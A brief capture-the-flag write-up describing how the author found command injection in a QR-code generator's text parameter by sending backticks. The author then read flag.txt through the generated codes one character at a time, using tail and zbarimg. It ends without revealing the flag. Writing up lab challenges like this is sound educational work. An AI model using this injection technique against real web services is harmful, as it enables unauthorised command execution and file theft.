Website is simple: we input, it goes to a url and uses it to generate a QR code of what we input. Sadly, only the first character of what we input gets QR coded. More on this later.
I decided to cut out the middle man and go straight to /qr?text=<insert text here> for ease. I found when putting backticks inside of the text it errored.
A little research tells you that backticks are used for shells within a shell in php and bash. So there's probably some horribly filtered system or eval commands going on there that allow us to execute code using <command>.
We find that the output of the command is actually stored in the qr code! Hazzah! cat flag.txt it is!
Except...
It still only takes the first character.
I wrote a nice little script that uses tail to grab bytes of the flag at different positions, automating the qr code scan using zbarimg.
It didn't error like some other commands did
The first two characters were rt, so I took a wild guess.